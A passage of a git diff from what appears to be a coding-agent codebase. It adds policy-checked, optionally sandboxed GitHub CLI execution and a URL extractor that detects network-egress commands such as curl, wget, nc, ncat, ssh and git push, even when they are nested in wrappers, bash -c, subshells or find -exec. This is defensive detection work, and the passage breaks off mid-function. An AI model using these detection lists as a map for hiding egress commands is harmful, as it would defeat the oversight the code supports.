@@ -138,9 +502,312 @@ Original error:
 ${text}`,
 				},
 			],
+			isError: result.isError,
 			details: undefined,
 		};
 	}
 
 	return result;
 }
+
+async function executeGhArgv(
+	_toolCallId: string,
+	args: string[],
+	signal?: AbortSignal,
+	sandbox?: Sandbox,
+): Promise<AgentToolResult<BashBackgroundDetails | undefined>> {
+	const policyCommand = buildGhPolicyCommand(args);
+	const policyResult = checkCommand(policyCommand, process.cwd());
+	if (policyResult.decision === "forbidden") {
+		const matchInfo = policyResult.matchedRules
+			.map((rule) =>
+				rule.type === "prefix"
+					? `prefix: ${rule.matchedPrefix.join(" ")}`
+					: `heuristic: ${rule.command.join(" ")}`,
+			)
+			.join(", ");
+		return {
+			content: [
+				{
+					type: "text",
+					text: `Command blocked by execpolicy: ${policyCommand}\n\nDecision: forbidden\nMatched rules: ${matchInfo || "none"}\n\nTo allow this command, add a prefix_rule to .maestro/execpolicy`,
+				},
+			],
+			isError: true,
+			details: undefined,
+		};
+	}
+
+	if (isMutatingGhCommand(args)) {
+		requirePlanCheck("gh");
+	}
+
+	if (signal?.aborted) {
+		throw new Error("GitHub CLI command aborted before start");
+	}
+
+	if (sandbox) {
+		return executeGhInSandbox(policyCommand, args, sandbox, signal);
+	}
+
+	return new Promise((resolve, reject) => {
+		const child = spawn("gh", args, {
+			stdio: ["ignore", "pipe", "pipe"],
+			shell: false,
+			detached: true,
+			env: resolveShellEnvironment(undefined, {
+				workspaceDir: process.cwd(),
+			}),
+			...(signal ? { signal } : {}),
+		});
+		const stdoutCapture = createOutputCapture();
+		const stderrCapture = createOutputCapture();
+		let timedOut = false;
+		let aborted = false;
+		const buildResult = (
+			exitCode?: number | null,
+		): AgentToolResult<BashBackgroundDetails | undefined> => {
+			let output = finalizeCapturedOutput(stdoutCapture);
+			const stderr = finalizeCapturedOutput(stderrCapture);
+			if (stderr) {
+				if (output) output += "\n";
+				output += stderr;
+			}
+			const truncationMessages: string[] = [];
+			if (stdoutCapture.truncated) {
+				const displayedKB = Math.round(GH_MAX_BUFFER / 1024);
+				truncationMessages.push(
+					`stdout exceeded ${displayedKB}KB limit and was truncated`,
+				);
+			}
+			if (stderrCapture.truncated) {
+				const displayedKB = Math.round(GH_MAX_BUFFER / 1024);
+				truncationMessages.push(
+					`stderr exceeded ${displayedKB}KB limit and was truncated`,
+				);
+			}
+			if (truncationMessages.length > 0) {
+				output += `\n\n⚠️ Output truncated: ${truncationMessages.join("; ")}. Consider narrowing the gh query or requesting fewer fields.`;
+			}
+			if (timedOut) {
+				output += `\n\n⏱️ Command timed out after ${GH_TIMEOUT_MS / 1000}s`;
+			} else if (aborted) {
+				output += "\n\nCommand cancelled";
+			} else if (exitCode !== 0) {
+				output += `\n\nExit code: ${exitCode}`;
+			}
+
+			return {
+				content: [
+					{
+						type: "text",
+						text:
+							sanitizeWithStaticMask(output).trim() ||
+							"Command executed successfully (no output)",
+					},
+				],
+				isError: timedOut || aborted || exitCode !== 0,
+				details: undefined,
+			};
+		};
+
+		const onAbort = () => {
+			if (child.pid) {
+				killProcessTree(child.pid);
+				return;
+			}
+			child.kill("SIGTERM");
+		};
+		const onSignalAbort = () => {
+			aborted = true;
+			onAbort();
+		};
+		const timeoutHandle = setTimeout(() => {
+			timedOut = true;
+			onAbort();
+		}, GH_TIMEOUT_MS);
+		const cleanup = () => {
+			clearTimeout(timeoutHandle);
+			if (signal) {
+				signal.removeEventListener("abort", onSignalAbort);
+			}
+		};
+		if (signal) {
+			signal.addEventListener("abort", onSignalAbort, { once: true });
+			if (signal.aborted) {
+				onSignalAbort();
+			}
+		}
+
+		child.stdout?.on("data", (data) => {
+			appendCapturedOutput(stdoutCapture, Buffer.from(data));
+		});
+		child.stderr?.on("data", (data) => {
+			appendCapturedOutput(stderrCapture, Buffer.from(data));
+		});
+		child.on("error", (error) => {
+			cleanup();
+			if ((error as { code?: string }).code === "ENOENT") {
+				resolve(ghCliNotInstalledResult());
+				return;
+			}
+			if (signal?.aborted || aborted) {
+				aborted = true;
+				resolve(buildResult());
+				return;
+			}
+			reject(error);
+		});
+		child.on("close", (code) => {
+			cleanup();
+			resolve(buildResult(code));
+		});
+	});
+}
+
+async function executeGhInSandbox(
+	command: string,
+	args: string[],
+	sandbox: Sandbox,
+	signal?: AbortSignal,
+): Promise<AgentToolResult<BashBackgroundDetails | undefined>> {
+	const stdoutCapture = createOutputCapture();
+	const stderrCapture = createOutputCapture();
+	let timedOut = false;
+	let aborted = false;
+
+	const buildResult = (exitCode?: number) => {
+		if (signal?.aborted) {
+			aborted = true;
+		}
+		let output = finalizeCapturedOutput(stdoutCapture);
+		const stderr = finalizeCapturedOutput(stderrCapture);
+		if (stderr) {
+			if (output) output += "\n";
+			output += stderr;
+		}
+		const truncationMessages: string[] = [];
+		if (stdoutCapture.truncated) {
+			const displayedKB = Math.round(GH_MAX_BUFFER / 1024);
+			truncationMessages.push(
+				`stdout exceeded ${displayedKB}KB limit and was truncated`,
+			);
+		}
+		if (stderrCapture.truncated) {
+			const displayedKB = Math.round(GH_MAX_BUFFER / 1024);
+			truncationMessages.push(
+				`stderr exceeded ${displayedKB}KB limit and was truncated`,
+			);
+		}
+		if (truncationMessages.length > 0) {
+			output += `\n\n⚠️ Output truncated: ${truncationMessages.join("; ")}. Consider narrowing the gh query or requesting fewer fields.`;
+		}
+		if (timedOut) {
+			output += `\n\n⏱️ Command timed out after ${GH_TIMEOUT_MS / 1000}s`;
+		} else if (aborted) {
+			output += "\n\nCommand cancelled";
+		} else if (exitCode !== undefined && exitCode !== 0) {
+			output += `\n\nExit code: ${exitCode}`;
+		}
+
+		return {
+			content: [
+				{
+					type: "text" as const,
+					text:
+						sanitizeWithStaticMask(output).trim() ||
+						"Command executed successfully (no output)",
+				},
+			],
+			isError:
+				timedOut || aborted || (exitCode !== undefined && exitCode !== 0),
+			details: undefined,
+		};
+	};
+
+	const timeoutController = new AbortController();
+	const timeoutHandle = setTimeout(() => {
+		timedOut = true;
+		timeoutController.abort();
+	}, GH_TIMEOUT_MS);
+	const onSignalAbort = () => {
+		aborted = true;
+	};
+	if (signal) {
+		signal.addEventListener("abort", onSignalAbort, { once: true });
+		if (signal.aborted) {
+			onSignalAbort();
+		}
+	}
+	let cleanupCombinedSignal = () => {};
+	let combinedSandboxSignal: AbortSignal | undefined;
+	let abortExec: (() => void) | undefined;
+
+	try {
+		const env = resolveShellEnvironment(undefined, {
+			workspaceDir: process.cwd(),
+		});
+		if (!sandbox.execWithArgs) {
+			return {
+				content: [
+					{
+						type: "text",
+						text: "Sandbox gh execution requires argv-capable sandbox support.",
+					},
+				],
+				isError: true,
+				details: undefined,
+			};
+		}
+		const combinedSignal = signal
+			? combineAbortSignals([signal, timeoutController.signal])
+			: { signal: timeoutController.signal, cleanup: () => {} };
+		combinedSandboxSignal = combinedSignal.signal;
+		cleanupCombinedSignal = combinedSignal.cleanup;
+		const execAbortPromise = new Promise<never>((_, reject) => {
+			abortExec = () => reject(new Error("Sandbox gh command aborted"));
+			if (aborted || combinedSignal.signal.aborted) {
+				abortExec();
+				return;
+			}
+			combinedSignal.signal.addEventListener("abort", abortExec, {
+				once: true,
+			});
+		});
+		const result = await Promise.race([
+			sandbox.execWithArgs("gh", args, {
+				env,
+				maxBuffer: GH_SANDBOX_MAX_BUFFER,
+				signal: combinedSignal.signal,
+			}),
+			execAbortPromise,
+		]);
+		appendCapturedOutput(stdoutCapture, Buffer.from(result.stdout));
+		appendCapturedOutput(stderrCapture, Buffer.from(result.stderr));
+		return buildResult(result.exitCode);
+	} catch (error) {
+		const execError = error as {
+			stdout?: string | Buffer;
+			stderr?: string | Buffer;
+		};
+		if (typeof execError.stdout === "string") {
+			appendCapturedOutput(stdoutCapture, Buffer.from(execError.stdout));
+		}
+		if (typeof execError.stderr === "string") {
+			appendCapturedOutput(stderrCapture, Buffer.from(execError.stderr));
+		}
+		if (timedOut || aborted) {
+			return buildResult();
+		}
+		throw error;
+	} finally {
+		clearTimeout(timeoutHandle);
+		if (abortExec && combinedSandboxSignal) {
+			combinedSandboxSignal.removeEventListener("abort", abortExec);
+		}
+		cleanupCombinedSignal();
+		if (signal) {
+			signal.removeEventListener("abort", onSignalAbort);
+		}
+	}
+}
diff --git a/src/tools/gh.ts b/src/tools/gh.ts
index dec4605b3..df16b7d1e 100644
--- a/src/tools/gh.ts
+++ b/src/tools/gh.ts
@@ -76,8 +76,8 @@ Examples:
 	maxRetries: 2,
 	retryDelayMs: 1000,
 	shouldRetry: isGhRetryable,
-	async run(params, { signal, respond }) {
-		const check = await checkGhCliAvailable(signal);
+	async run(params, { signal, respond, sandbox }) {
+		const check = await checkGhCliAvailable(signal, sandbox);
 		if (check) return check;
 
 		const args: string[] = ["pr", params.action];
@@ -126,8 +126,7 @@ Examples:
 			if (params.nameOnly) args.push("--name-only");
 		}
 
-		const cmd = `gh ${args.map((a) => `"${a.replace(/"/g, '\\"')}"`).join(" ")}`;
-		return executeGhCommand(`gh-pr-${params.action}`, cmd, signal);
+		return executeGhCommand(`gh-pr-${params.action}`, args, signal, sandbox);
 	},
 });
 
@@ -180,8 +179,8 @@ Examples:
 	maxRetries: 2,
 	retryDelayMs: 1000,
 	shouldRetry: isGhRetryable,
-	async run(params, { signal }) {
-		const check = await checkGhCliAvailable(signal);
+	async run(params, { signal, sandbox }) {
+		const check = await checkGhCliAvailable(signal, sandbox);
 		if (check) return check;
 
 		const args: string[] = ["issue", params.action];
@@ -211,8 +210,7 @@ Examples:
 			args.push(String(params.number));
 		}
 
-		const cmd = `gh ${args.map((a) => `"${a.replace(/"/g, '\\"')}"`).join(" ")}`;
-		return executeGhCommand(`gh-issue-${params.action}`, cmd, signal);
+		return executeGhCommand(`gh-issue-${params.action}`, args, signal, sandbox);
 	},
 });
 
@@ -249,8 +247,8 @@ Examples:
 	maxRetries: 2,
 	retryDelayMs: 1000,
 	shouldRetry: isGhRetryable,
-	async run(params, { signal }) {
-		const check = await checkGhCliAvailable(signal);
+	async run(params, { signal, sandbox }) {
+		const check = await checkGhCliAvailable(signal, sandbox);
 		if (check) return check;
 
 		const args: string[] = ["repo", params.action];
@@ -266,7 +264,6 @@ Examples:
 		}
 		// fork has no additional params
 
-		const cmd = `gh ${args.map((a) => `"${a.replace(/"/g, '\\"')}"`).join(" ")}`;
-		return executeGhCommand(`gh-repo-${params.action}`, cmd, signal);
+		return executeGhCommand(`gh-repo-${params.action}`, args, signal, sandbox);
 	},
 });
diff --git a/src/utils/url-extractor.ts b/src/utils/url-extractor.ts
index 43171b0ee..dc92076ed 100644
--- a/src/utils/url-extractor.ts
+++ b/src/utils/url-extractor.ts
@@ -20,10 +20,1261 @@
 const URL_PATTERN = /https?:\/\/[^\s"'<>]+/gi;
 
 /**
- * Pattern to extract arguments from curl/wget commands.
+ * Commands that can initiate network egress from shell tool calls.
  */
-const CURL_WGET_PATTERN =
-	/(?:curl|wget)\s+((?:[^\s;&|<>`$()]|\\.)+(?:\s+(?:[^\s;&|<>`$()]|\\.)+)*)/gi;
+const NETWORK_COMMANDS = new Set([
+	"aria2c",
+	"curl",
+	"ftp",
+	"git",
+	"http",
+	"https",
+	"nc",
+	"ncat",
+	"netcat",
+	"sftp",
+	"ssh",
+	"telnet",
+	"wget",
+	"wget2",
+]);
+
+const URL_POSITIONAL_COMMANDS = new Set([
+	"aria2c",
+	"curl",
+	"http",
+	"https",
+	"wget",
+	"wget2",
+]);
+
+const NETWORK_WRAPPER_COMMANDS = new Set([
+	"busybox",
+	"command",
+	"doas",
+	"env",
+	"exec",
+	"nice",
+	"nohup",
+	"setsid",
+	"sudo",
+	"time",
+	"timeout",
+	"xargs",
+]);
+
+const SHELL_WRAPPER_COMMANDS = new Set([
+	"bash",
+	"dash",
+	"fish",
+	"ksh",
+	"mksh",
+	"sh",
+	"zsh",
+]);
+
+const SHELL_FLAGS_WITH_VALUES = new Set([
+	"--init-file",
+	"--rcfile",
+	"-rcfile",
+	"-o",
+	"+o",
+	"-O",
+	"+O",
+]);
+const SHELL_SHORT_FLAGS_BEFORE_COMMAND = new Set([
+	"a",
+	"b",
+	"e",
+	"f",
+	"h",
+	"i",
+	"k",
+	"l",
+	"m",
+	"n",
+	"p",
+	"r",
+	"s",
+	"t",
+	"u",
+	"v",
+	"x",
+	"B",
+	"C",
+	"D",
+	"E",
+	"H",
+	"P",
+]);
+const EXEC_WRAPPER_FLAGS_WITH_VALUES = new Set(["-a"]);
+
+const NETWORK_GIT_SUBCOMMANDS = new Set([
+	"archive",
+	"clone",
+	"config",
+	"fetch",
+	"ls-remote",
+	"pull",
+	"push",
+	"remote",
+	"submodule",
+]);
+
+const GIT_NESTED_SUBCOMMAND_WRAPPERS = new Set(["lfs", "svn"]);
+
+const GIT_GLOBAL_FLAGS_WITH_VALUES = new Set([
+	"-C",
+	"-c",
+	"--config-env",
+	"--exec-path",
+	"--git-dir",
+	"--namespace",
+	"--super-prefix",
+	"--work-tree",
+]);
+
+const GIT_CLONE_FLAGS_WITH_VALUES = new Set([
+	"-b",
+	"--branch",
+	"-c",
+	"--config",
+	"--bundle-uri",
+	"--depth",
+	"--filter",
+	"-j",
+	"--jobs",
+	"-o",
+	"--origin",
+	"--reference",
+	"--reference-if-able",
+	"--separate-git-dir",
+	"--server-option",
+	"--shallow-exclude",
+	"--shallow-since",
+	"--template",
+	"-u",
+	"--upload-pack",
+]);
+
+const GIT_REMOTE_ADD_FLAGS_WITH_VALUES = new Set([
+	"-m",
+	"--master",
+	"-t",
+	"--track",
+]);
+
+const GIT_CONFIG_FLAGS_WITH_VALUES = new Set([
+	"-f",
+	"--blob",
+	"--comment",
+	"--default",
+	"--file",
+	"--fixed-value",
+	"--type",
+	"--value",
+]);
+
+const GIT_REMOTE_LOCAL_ACTIONS = new Set([
+	"get-url",
+	"prune",
+	"remove",
+	"rename",
+	"rm",
+	"set-branches",
+	"set-head",
+]);
+
+const GIT_SUBMODULE_ADD_FLAGS_WITH_VALUES = new Set([
+	"-b",
+	"--branch",
+	"--depth",
+	"--name",
+	"--reference",
+]);
+
+const GIT_SUBMODULE_LOCAL_ACTIONS = new Set([
+	"absorbgitdirs",
+	"deinit",
+	"init",
+	"set-branch",
+	"status",
+	"summary",
+	"sync",
+]);
+
+// Flags that take a value as the next argument.
+const FLAGS_WITH_VALUES = new Set([
+	"-X",
+	"--request",
+	"-o",
+	"-O",
+	"--output",
+	"-H",
+	"--header",
+	"-d",
+	"--data",
+	"--data-raw",
+	"--data-binary",
+	"--data-urlencode",
+	"-F",
+	"--form",
+	"-A",
+	"--user-agent",
+	"-u",
+	"--user",
+	"-T",
+	"--upload-file",
+	"-e",
+	"--referer",
+	"-b",
+	"--cookie",
+	"-c",
+	"--cookie-jar",
+	"-K",
+	"--config",
+	"--resolve",
+	"--connect-to",
+	"--max-time",
+	"-m",
+	"--retry",
+	"--retry-delay",
+	"-w",
+	"--write-out",
+	"-p",
+	"--port",
+	"-i",
+	"--identity-file",
+]);
+
+const ENV_WRAPPER_FLAGS_WITH_VALUES = new Set(["-u", "--unset"]);
+
+const NICE_WRAPPER_FLAGS_WITH_VALUES = new Set(["-n", "--adjustment"]);
+
+const DOAS_WRAPPER_FLAGS_WITH_VALUES = new Set(["-C", "-u"]);
+
+const SUDO_WRAPPER_FLAGS_WITH_VALUES = new Set([
+	"-C",
+	"--close-from",
+	"-g",
+	"--group",
+	"-h",
+	"--host",
+	"-p",
+	"--prompt",
+	"-T",
+	"--command-timeout",
+	"-u",
+	"--user",
+]);
+
+const TIMEOUT_WRAPPER_FLAGS_WITH_VALUES = new Set([
+	"-k",
+	"--kill-after",
+	"-s",
+	"--signal",
+]);
+
+const XARGS_WRAPPER_FLAGS_WITH_VALUES = new Set([
+	"-a",
+	"--arg-file",
+	"-d",
+	"--delimiter",
+	"-E",
+	"--eof",
+	"-e",
+	"--eof-str",
+	"-I",
+	"--replace",
+	"-i",
+	"-L",
+	"--max-lines",
+	"-l",
+	"-n",
+	"--max-args",
+	"-P",
+	"--max-procs",
+	"-s",
+	"--max-chars",
+]);
+
+interface ShellToken {
+	value: string;
+	separator: boolean;
+}
+
+function cleanExtractedUrl(url: string): string {
+	const trailingPunctuation = url.includes("://[")
+		? /[)},.;:]+$/
+		: /[)}\],.;:]+$/;
+	return url.replace(trailingPunctuation, "");
+}
+
+function shellCommandName(token: string): string {
+	const base = token.replace(/\\/g, "").split("/").pop() ?? token;
+	return base.toLowerCase();
+}
+
+function isEnvAssignment(token: string): boolean {
+	return /^[A-Za-z_][A-Za-z0-9_]*=/.test(token);
+}
+
+function wrapperFlagTakesValue(commandName: string, flag: string): boolean {
+	if (commandName === "env") {
+		return ENV_WRAPPER_FLAGS_WITH_VALUES.has(flag);
+	}
+	if (commandName === "exec") {
+		return EXEC_WRAPPER_FLAGS_WITH_VALUES.has(flag);
+	}
+	if (commandName === "nice") {
+		return NICE_WRAPPER_FLAGS_WITH_VALUES.has(flag);
+	}
+	if (commandName === "doas") {
+		return DOAS_WRAPPER_FLAGS_WITH_VALUES.has(flag);
+	}
+	if (commandName === "sudo") {
+		return SUDO_WRAPPER_FLAGS_WITH_VALUES.has(flag);
+	}
+	if (commandName === "timeout") {
+		return TIMEOUT_WRAPPER_FLAGS_WITH_VALUES.has(flag);
+	}
+	if (commandName === "xargs") {
+		return XARGS_WRAPPER_FLAGS_WITH_VALUES.has(flag);
+	}
+	return false;
+}
+
+function commandWrapperDoesNotExecute(segment: string[]): boolean {
+	if (shellCommandName(segment[0] ?? "") !== "command") {
+		return false;
+	}
+
+	for (let index = 1; index < segment.length; index += 1) {
+		const arg = segment[index]!;
+		if (arg === "--") {
+			return false;
+		}
+		if (!arg.startsWith("-") || arg === "-") {
+			return false;
+		}
+		if (arg === "-v" || arg === "-V") {
+			return true;
+		}
+		if (!arg.startsWith("--") && /[vV]/.test(arg.slice(1))) {
+			return true;
+		}
+	}
+
+	return false;
+}
+
+function tokenizeShellCommand(command: string): ShellToken[] {
+	const tokens: ShellToken[] = [];
+	let current = "";
+	let quote: "'" | '"' | null = null;
+	let escaped = false;
+
+	const pushCurrent = () => {
+		if (current.length > 0) {
+			tokens.push({ value: current, separator: false });
+			current = "";
+		}
+	};
+
+	for (let index = 0; index < command.length; index += 1) {
+		const char = command[index]!;
+
+		if (escaped) {
+			current += char;
+			escaped = false;
+			continue;
+		}
+
+		if (char === "\\") {
+			escaped = true;
+			continue;
+		}
+
+		if (quote) {
+			if (char === quote) {
+				quote = null;
+			} else {
+				current += char;
+			}
+			continue;
+		}
+
+		if (char === "'" || char === '"') {
+			quote = char;
+			continue;
+		}
+
+		if (/\s/.test(char)) {
+			pushCurrent();
+			continue;
+		}
+
+		if (char === ";" || char === "&" || char === "|") {
+			pushCurrent();
+			const next = command[index + 1];
+			if ((char === "&" || char === "|") && next === char) {
+				tokens.push({ value: `${char}${next}`, separator: true });
+				index += 1;
+			} else {
+				tokens.push({ value: char, separator: true });
+			}
+			continue;
+		}
+
+		current += char;
+	}
+
+	if (escaped) {
+		current += "\\";
+	}
+	pushCurrent();
+
+	return tokens;
+}
+
+function commandSegments(tokens: ShellToken[]): string[][] {
+	const segments: string[][] = [];
+	let current: string[] = [];
+
+	for (const token of tokens) {
+		if (token.separator) {
+			if (current.length > 0) {
+				segments.push(current);
+				current = [];
+			}
+			continue;
+		}
+		current.push(token.value);
+	}
+
+	if (current.length > 0) {
+		segments.push(current);
+	}
+
+	return segments;
+}
+
+function skipWrapperArgs(segment: string[], commandName: string): string[] {
+	let index = 1;
+	while (index < segment.length) {
+		const arg = segment[index]!;
+		if (arg === "--") {
+			index += 1;
+			break;
+		}
+		if (commandName === "env" && isEnvAssignment(arg)) {
+			index += 1;
+			continue;
+		}
+		if (!arg.startsWith("-")) {
+			break;
+		}
+		const [flag] = arg.split("=", 1);
+		index += 1;
+		if (
+			flag &&
+			wrapperFlagTakesValue(commandName, flag) &&
+			!arg.includes("=") &&
+			index < segment.length
+		) {
+			index += 1;
+		}
+	}
+
+	if (commandName === "timeout" && index < segment.length) {
+		index += 1;
+	}
+
+	return segment.slice(index);
+}
+
+function extractShellCommandString(segment: string[]): string | null {
+	for (let index = 1; index < segment.length; index += 1) {
+		const arg = segment[index]!;
+		if (arg === "--") {
+			return null;
+		}
+		if (arg === "--command") {
+			return segment[index + 1] ?? null;
+		}
+		if (arg.startsWith("--command=")) {
+			return arg.slice("--command=".length) || null;
+		}
+		if (SHELL_FLAGS_WITH_VALUES.has(arg)) {
+			index += 1;
+			continue;
+		}
+		if (
+			arg.startsWith("--init-file=") ||
+			arg.startsWith("--rcfile=") ||
+			arg.startsWith("-rcfile=")
+		) {
+			continue;
+		}
+		if (!arg.startsWith("-")) {
+			return null;
+		}
+		if (!arg.startsWith("--")) {
+			const commandFlagIndex = arg.indexOf("c", 1);
+			if (
+				commandFlagIndex !== -1 &&
+				commandFlagIndex <= 5 &&
+				[...arg.slice(1, commandFlagIndex)].every((flag) =>
+					SHELL_SHORT_FLAGS_BEFORE_COMMAND.has(flag),
+				)
+			) {
+				const gluedCommand = arg.slice(commandFlagIndex + 1);
+				return gluedCommand.length > 1
+					? gluedCommand
+					: (segment[index + 1] ?? null);
+			}
+		}
+	}
+
+	return null;
+}
+
+function extractNestedShellCommand(segment: string[]): string | null {
+	let remaining = segment;
+
+	while (remaining.length > 0) {
+		const commandName = shellCommandName(remaining[0] ?? "");
+		if (SHELL_WRAPPER_COMMANDS.has(commandName)) {
+			return extractShellCommandString(remaining);
+		}
+
+		if (!NETWORK_WRAPPER_COMMANDS.has(commandName)) {
+			return null;
+		}
+
+		if (commandWrapperDoesNotExecute(remaining)) {
+			return null;
+		}
+
+		remaining = skipWrapperArgs(remaining, commandName);
+	}
+
+	return null;
+}
+
+function findParenthesizedCommandEnd(
+	command: string,
+	startIndex: number,
+	startOffset = 1,
+): number {
+	let depth = 1;
+	let quote: "'" | '"' | null = null;
+	let escaped = false;
+
+	for (
+		let index = startIndex + startOffset;
+		index < command.length;
+		index += 1
+	) {
+		const char = command[index]!;
+
+		if (escaped) {
+			escaped = false;
+			continue;
+		}
+
+		if (char === "\\") {
+			escaped = true;
+			continue;
+		}
+
+		if (quote === "'") {
+			if (char === "'") {
+				quote = null;
+			}
+			continue;
+		}
+
+		if (quote === '"') {
+			if (char === '"') {
+				quote = null;
+				continue;
+			}
+			if (
+				char === "$" &&
+				command[index + 1] === "(" &&
+				command[index + 2] !== "("
+			) {
+				depth += 1;
+				index += 1;
+			}
+			continue;
+		}
+
+		if (char === "'" || char === '"') {
+			quote = char;
+			continue;
+		}
+
+		if (
+			char === "$" &&
+			command[index + 1] === "(" &&
+			command[index + 2] !== "("
+		) {
+			depth += 1;
+			index += 1;
+			continue;
+		}
+
+		if (char === "(") {
+			depth += 1;
+			continue;
+		}
+
+		if (char === ")") {
+			depth -= 1;
+			if (depth === 0) {
+				return index;
+			}
+		}
+	}
+
+	return -1;
+}
+
+function findCommandSubstitutionEnd(
+	command: string,
+	startIndex: number,
+): number {
+	return findParenthesizedCommandEnd(command, startIndex, 2);
+}
+
+function extractSubshellCommands(command: string): string[] {
+	const commands: string[] = [];
+	let quote: "'" | '"' | null = null;
+	let escaped = false;
+
+	const startsAfterShellBoundary = (index: number): boolean => {
+		for (let current = index - 1; current >= 0; current -= 1) {
+			const value = command[current];
+			if (value === "\n" || value === "\r") {
+				return true;
+			}
+			if (value && !/\s/.test(value)) {
+				return value === ";" || value === "&" || value === "|" || value === "(";
+			}
+		}
+		return true;
+	};
+
+	for (let index = 0; index < command.length; index += 1) {
+		const char = command[index]!;
+
+		if (escaped) {
+			escaped = false;
+			continue;
+		}
+
+		if (char === "\\") {
+			escaped = true;
+			continue;
+		}
+
+		if (quote === "'") {
+			if (char === "'") {
+				quote = null;
+			}
+			continue;
+		}
+
+		if (quote === '"') {
+			if (char === '"') {
+				quote = null;
+			}
+			continue;
+		}
+
+		if (char === "'" || char === '"') {
+			quote = char;
+			continue;
+		}
+
+		const isProcessSubstitution =
+			command[index - 1] === "<" || command[index - 1] === ">";
+		if (
+			char === "(" &&
+			command[index - 1] !== "$" &&
+			command[index + 1] !== "(" &&
+			(isProcessSubstitution || startsAfterShellBoundary(index))
+		) {
+			const endIndex = findParenthesizedCommandEnd(command, index);
+			if (endIndex !== -1) {
+				const nested = command.slice(index + 1, endIndex).trim();
+				if (nested) {
+					commands.push(nested);
+				}
+				index = endIndex;
+			}
+		}
+	}
+
+	return commands;
+}
+
+function extractFindExecSegments(segment: string[]): string[][] {
+	const commands: string[][] = [];
+
+	for (let index = 1; index < segment.length; index += 1) {
+		const arg = segment[index]!;
+		if (
+			arg !== "-exec" &&
+			arg !== "-execdir" &&
+			arg !== "-ok" &&
+			arg !== "-okdir"
+		) {
+			continue;
+		}
+
+		const start = index + 1;
+		let end = start;
+		while (end < segment.length) {
+			const token = segment[end]!;
+			if (token === ";" || token === "+") {
+				break;
+			}
+			end += 1;
+		}
+
+		if (end > start) {
+			commands.push(segment.slice(start, end));
+		}
+		index = end;
+	}
+
+	return commands;
+}
+
+function extractEmbeddedCommandSegments(segment: string[]): string[][] {
+	let remaining = segment;
+
+	while (remaining.length > 0) {
+		const commandName = shellCommandName(remaining[0] ?? "");
+		if (commandName === "find") {
+			return extractFindExecSegments(remaining);
+		}
+		if (!NETWORK_WRAPPER_COMMANDS.has(commandName)) {
+			return [];
+		}
+		if (commandWrapperDoesNotExecute(remaining)) {
+			return [];
+		}
+		remaining = skipWrapperArgs(remaining, commandName);
+	}
+
+	return [];
+}
+
+function nestedCommandSegments(
+	segment: string[],
+	seen: Set<string>,
+): string[][] {
+	const segments: string[][] = [];
+	const nestedShell = extractNestedShellCommand(segment);
+	if (nestedShell) {
+		segments.push(...allCommandSegments(nestedShell, seen));
+	}
+
+	for (const embeddedSegment of extractEmbeddedCommandSegments(segment)) {
+		segments.push(
+			embeddedSegment,
+			...nestedCommandSegments(embeddedSegment, seen),
+		);
+	}
+
+	return segments;
+}
+
+function extractCommandSubstitutionCommands(command: string): string[] {
+	const commands: string[] = [];
+	let quote: "'" | '"' | null = null;
+	let escaped = false;
+
+	for (let index = 0; index < command.length; index += 1) {
+		const char = command[index]!;
+
+		if (escaped) {
+			escaped = false;
+			continue;
+		}
+
+		if (char === "\\") {
+			escaped = true;
+			continue;
+		}
+
+		if (quote === "'") {
+			if (char === "'") {
+				quote = null;
+			}
+			continue;
+		}
+
+		if (quote === '"') {
+			if (char === '"') {
+				quote = null;
+				continue;
+			}
+			if (
+				char === "$" &&
+				command[index + 1] === "(" &&
+				command[index + 2] !== "("
+			) {
+				const endIndex = findCommandSubstitutionEnd(command, index);
+				if (endIndex !== -1) {
+					const nested = command.slice(index + 2, endIndex).trim();
+					if (nested) {
+						commands.push(nested);
+					}
+					index = endIndex;
+				}
+			}
+			if (char === "`") {
+				const endIndex = command.indexOf("`", index + 1);
+				if (endIndex !== -1) {
+					const nested = command.slice(index + 1, endIndex).trim();
+					if (nested) {
+						commands.push(nested);
+					}
+					index = endIndex;
+				}
+			}
+			continue;
+		}
+
+		if (char === "'" || char === '"') {
+			quote = char;
+			continue;
+		}
+
+		if (
+			char === "$" &&
+			command[index + 1] === "(" &&
+			command[index + 2] !== "("
+		) {
+			const endIndex = findCommandSubstitutionEnd(command, index);
+			if (endIndex !== -1) {
+				const nested = command.slice(index + 2, endIndex).trim();
+				if (nested) {
+					commands.push(nested);
+				}
+				index = endIndex;
+			}
+			continue;
+		}
+
+		if (char === "`") {
+			const endIndex = command.indexOf("`", index + 1);
+			if (endIndex !== -1) {
+				const nested = command.slice(index + 1, endIndex).trim();
+				if (nested) {
+					commands.push(nested);
+				}
+				index = endIndex;
+			}
+		}
+	}
+
+	return commands;
+}
+
+function allCommandSegments(
+	command: string,
+	seen = new Set<string>(),
+): string[][] {
+	if (seen.has(command)) {
+		return [];
+	}
+	seen.add(command);
+
+	const segments = commandSegments(tokenizeShellCommand(command));
+	const nestedSegments = segments.flatMap((segment) =>
+		nestedCommandSegments(segment, seen),
+	);
+	const substitutionSegments = extractCommandSubstitutionCommands(
+		command,
+	).flatMap((nested) => allCommandSegments(nested, seen));
+	const subshellSegments = extractSubshellCommands(command).flatMap((nested) =>
+		allCommandSegments(nested, seen),
+	);
+
+	return [
+		...segments,
+		...nestedSegments,
+		...substitutionSegments,
+		...subshellSegments,
+	];
+}
+
+function unwrapNetworkInvocation(
+	segment: string[],
+): { commandName: string; args: string[]; display: string[] } | null {
+	let remaining = segment;
+
+	while (remaining.length > 0) {
+		const commandName = shellCommandName(remaining[0] ?? "");
+		if (NETWORK_COMMANDS.has(commandName)) {
+			return {
+				commandName,
+				args: remaining.slice(1),
+				display: remaining,
+			};
+		}
+
+		if (!NETWORK_WRAPPER_COMMANDS.has(commandName)) {
+			return null;
+		}
+
+		if (commandWrapperDoesNotExecute(remaining)) {
+			return null;
+		}
+
+		remaining = skipWrapperArgs(remaining, commandName);
+	}
+
+	return null;
+}
+
+function looksLikeHostTarget(value: string): boolean {
+	if (!value || value.startsWith("-")) {
+		return false;
+	}
+	if (/^https?:\/\//i.test(value)) {
+		return true;
+	}
+	if (/^\[[0-9a-f:.%]+\](?::\d+)?(?:\/.*)?$/i.test(value)) {
+		return true;
+	}
+	if (/^(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:\/.*)?$/.test(value)) {
+		return true;
+	}
+	if (/^localhost(?::\d+)?(?:\/.*)?$/i.test(value)) {
+		return true;
+	}
+	if (/^[a-z0-9.-]+\.[a-z0-9-]+(?::\d+)?(?:\/.*)?$/i.test(value)) {
+		return true;
+	}
+	if (/^[^@\s]+@[a-z0-9.-]+\.[a-z0-9-]+(?::[^\s]+|\/.*)?$/i.test(value)) {
